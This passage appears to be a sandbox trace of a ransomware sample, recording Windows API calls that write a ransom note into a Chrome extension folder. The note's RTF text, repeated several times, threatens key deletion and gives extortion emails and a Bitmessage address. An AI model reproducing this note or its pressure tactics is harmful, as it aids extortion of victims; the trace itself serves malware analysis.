\\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0292.171] WriteFile (in: hFile=0x2e8, lpBuffer=0x1ef8bd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef8bd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.171] CloseHandle (hObject=0x2e8) returned 1 [0292.171] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\#readme_eman#.rtf")) returned 0xffffffff [0292.172] GetLastError () returned 0x2 [0292.172] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.172] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.172] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.172] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef8bd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b 